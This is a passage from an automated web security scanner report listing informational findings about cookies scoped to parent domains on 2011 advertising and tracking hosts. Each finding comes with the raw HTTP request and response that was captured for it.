ICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:48 GMT; Path=/
Set-Cookie: NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf410&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:36:48 GMT; Path=/
X-Proc-ms: 7
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

10.42. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=2724386019227846218 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1304949602; i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:12 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; expires=Wed, 08-May-2013 15:37:12 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.43. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=foAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NX8bLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; GUID=MTMwNDk1NTQyMzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.786652.0XMC
Set-Cookie: C2=kpAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NXAcLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: F1=BQmCI3kAAAAAYm1CAEAA8DABAAAABAAAAMAA8DA; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: BASE=Rgwq+yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QM!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: ROLL=boAnr2C+ORAgA1G9JNnz8yH!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: 46632794=_4dc80a64,1210252042,786652^981604^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 15:38:12 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0000981
...[SNIP]...

10.44. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=39531&partnerID=226&clientID=4716&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjjl0gZcefgJT9Cwcy975nBDKnGwOZc34wAcl3B5iBZGcHM1B4ogqQORcozMTBATRyJ9C+u7eOgO17sRukYGMxkPnkAsjMt7tB+k6CzbjwHUQeOgIiZ4JFmv+DbeQAMpv+gwTudYL07/cDMi/uBQms3Q8y5eU+JgCPhUHM"; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG48plFgEni6YQF71gUGDUWTgTSBowWYD6XDMeFD0xA2cdgWSaNO5uXAmWZLO5AZb9/YxZglPj/bD5Y7//jC8F6wXyg7OwbINnnUNn2+RCTwXwuEY6VZ1mBsp3f24CyDBoMBgwWDEDRewdYgfZtufDrLbLoK7Abny36gSK6Yj7IhMl9p1FEd94H2Tpr/lqEKAB9a00/"; io_freq_p1="eJzjkuY4HijAIvF0woJ3LAqMGgsnAmkDRgswn0ucY7e1AJPEY7AkgwaDAZPFHajEAhegxP9n8+ESz0FsLmGOqxECjBKd39ugEgwWDEDB9a5A1Vsu/HqLLLgtFKhyct9pFMG9LkDBWfPXIgQB0Zcv8g=="; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:31:19 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 08-May-2012 15:31:19 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1114604&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


10.45. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6544434

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6544434 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1Nk

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:38:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Mon, 07-May-2012 15:38:26 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcg; expires=Wed, 08-May-2013 15:38:26 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


10.46. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Stats/Tracker.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckUserId=null&plckGcid=Pluck4&plckCurrentTime=1304955414035 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close


10.47. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:38:33 GMT
Connection: close
Content-Length: 94369

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

10.48. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/comments/comments.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-Modified-Since: Mon, 09 May 2011 08:27:57 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Connection: close
Date: Mon, 09 May 2011 15:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Content-Encoding: deflate
Content-Length: 0
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Cache-Control: public
Last-Modified: Mon, 09 May 2011 08:27:57 GMT
ETag: "4889D0CFAF8896B1003B735074638083"
Content-Type: text/html


10.49. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/pluck.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/pluck.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-Modified-Since: Mon, 09 May 2011 08:27:57 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Connection: close
Date: Mon, 09 May 2011 15:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Content-Encoding: deflate
Content-Length: 0
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Cache-Control: public
Last-Modified: Mon, 09 May 2011 08:27:57 GMT
ETag: "3CCDE5EE851A7D416FF8A4E14DAD9DB7"
Content-Type: text/html


10.50. http://syndication.mmismm.com/tntwo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&r=&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:00 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sun, 08-May-2016 21:35:00 GMT; path=/; domain=.mmismm.com
Content-Length: 62
Content-Type: text/javascript

var msegs='AG=1;AK=1;AM=1;AQ=1';Mindset.handleResponse(msegs);

10.51. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=AAU&si=18181&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
